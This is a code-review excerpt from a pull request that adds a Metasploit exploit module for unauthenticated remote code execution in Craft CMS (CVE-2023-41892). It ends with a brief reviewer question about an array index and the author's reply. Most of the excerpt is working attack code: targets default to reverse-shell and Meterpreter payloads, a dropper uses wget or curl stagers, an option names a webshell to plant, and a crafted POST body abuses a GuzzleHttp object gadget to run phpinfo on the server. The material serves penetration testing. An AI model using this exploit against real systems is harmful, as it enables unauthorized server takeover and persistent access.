modules/exploits/linux/http/craftcms_unauth_rce_cve_2023_41892.rb

```diff
@@ -0,0 +1,289 @@
+        'Targets' => [
+          [
+            'PHP',
+            {
+              'Platform' => 'php',
+              'Arch' => ARCH_PHP,
+              'Type' => :php,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'php/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_bash'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ ARCH_X64, ARCH_X86 ],
+              'Type' => :linux_dropper,
+              'CmdStagerFlavor' => [ 'wget', 'curl', 'printf', 'echo', 'bourne' ],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2023-09-13',
+        'DefaultOptions' => {
+          'SSL' => true,
+          'RPORT' => 443
+        },
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION ]
+        }
+      )
+    )
+    register_options(
+      [
+        OptString.new('TARGETURI', [ true, 'Craft CMS base url', '/' ]),
+        OptString.new('WEBSHELL', [
+          false, 'The name of the webshell with extension .php. Webshell name will be randomly generated if left unset.', ''
+        ]),
+        OptEnum.new('COMMAND', [ true, 'Use PHP command function', 'passthru', [ 'passthru', 'shell_exec', 'system', 'exec' ]], conditions: %w[TARGET != 0])
+      ]
+    )
+  end
+
+  def check_phpinfo
+    # checks vulnerability running phpinfo() and returns upload_tmp_dir and DOCUMENT_ROOT
+    @config = { 'upload_tmp_dir' => nil, 'document_root' => nil }
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(datastore['TARGETURI']),
+      'ctype' => 'application/x-www-form-urlencoded',
+      'vars_post' => {
+        'action' => 'conditions/render',
+        'configObject[class]' => 'craft\elements\conditions\ElementCondition',
+        'config' => '{"name":"configObject","as ":{"class":"\\\GuzzleHttp\\\Psr7\\\FnStream", "__construct()":{"methods":{"close":"phpinfo"}}}}'
+      }
+    })
+    if res && res.body
+      # parse HTML to find the upload directory and the document root provided by phpinfo command output
+      html = res.get_html_document
+      if @config['upload_tmp_dir'].nil? || @config['document_root'].nil?
+        tr_items = html.css('tr td')
+        tr_items.each_with_index do |item, i|
+          if item.text =~ /upload_tmp_dir/i
+            if tr_items[i + 1].text =~ /no value/i
```

Comment:
Maybe check or catch the exception of i+1 does not exist?  Also, why are we adding 1; is this because we have different indexes?

Reply:
Done. See https://github.com/rapid7/metasploit-framework/pull/18612/commits/db099f8f4ce235dc253cc015baf6d114717909ca.